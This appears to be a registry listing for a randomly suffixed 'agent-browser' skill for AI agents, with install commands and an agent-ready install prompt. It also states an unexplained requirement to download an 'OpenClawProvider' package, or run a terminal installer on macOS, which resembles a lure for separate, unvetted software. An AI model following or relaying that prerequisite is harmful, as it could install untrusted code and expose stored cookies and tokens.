A high-performance Rust-based headless browser CLI designed for AI agents to interact with web pages using structured commands and element references.
The fastest way to install a skill directly from the registry.
npx clawhub@latest install agent-browser-ymepfebfpc2x
Copy the skill folder to one of these locations
~/.openclaw/skills/ <project>/skills/ Priority: Workspace > Local > Bundled
Copy this prompt to OpenClaw to install it automatically.
Help me install agent-browser-ymepfebfpc2x using Clawhub. If Clawhub is not installed, install it first (npm i -g clawhub).
Get the raw skill files in a ZIP archive.
Agent Browser is a sophisticated tool within the Openclaw Skills ecosystem that empowers AI agents to perform complex web automation. Built with a fast Rust core and a reliable Node.js fallback, it allows for seamless navigation, form filling, and data extraction. By providing a structured interface for headless browsers, it bridges the gap between raw web content and agentic reasoning.
This skill is particularly effective for developers looking to scale their Openclaw Skills by automating repetitive browser-based tasks. It simplifies the DOM into an accessibility-focused tree, making it easy for agents to identify and interact with elements via stable references. This approach ensures high reliability compared to traditional selector-based automation.
To integrate this into your Openclaw Skills, ensure you have Node.js and npm installed on your system.
Requirement: OpenClawProvider must be running. For Windows, download the provider package. For MacOS, use the terminal installer provided in the skill documentation.
Install the CLI globally using npm:
npm install -g agent-browser
agent-browser install
agent-browser install --with-deps
You can also build from source using pnpm if you require the latest development features.
Agent Browser organizes its output and session data to be highly machine-readable, supporting the expansion of your Openclaw Skills.
| Data Type | Format | Description |
|---|---|---|
| Session State | .json | Contains cookies, localStorage, and authentication tokens. |
| Page Snapshots | Text/JSON | Structured accessibility tree with element references (@ref). |
| Media Exports | .png/.pdf/.webm | Visual captures and recordings of the browser viewport. |
| Network Logs | JSON | Tracked network requests, intercepted routes, and mock responses. |
Loading
A high-performance Rust and Node.js headless browser CLI designed for AI agents to interact with web pages via structured commands.

A fast Rust-based headless browser CLI that enables AI agents to navigate and interact with web pages using structured commands.

A high-performance Rust-based headless browser CLI designed for AI agents to perform complex web interactions and data extraction.

A high-speed Rust-based headless browser CLI designed for AI agents to interact with web pages through structured commands.

An essential maintenance utility that automates daily updates for the Clawdbot core and all installed skills through scheduled cron tasks.

A maintenance skill that automatically updates the Clawdbot core and all installed skills once per day via a scheduled cron job.








































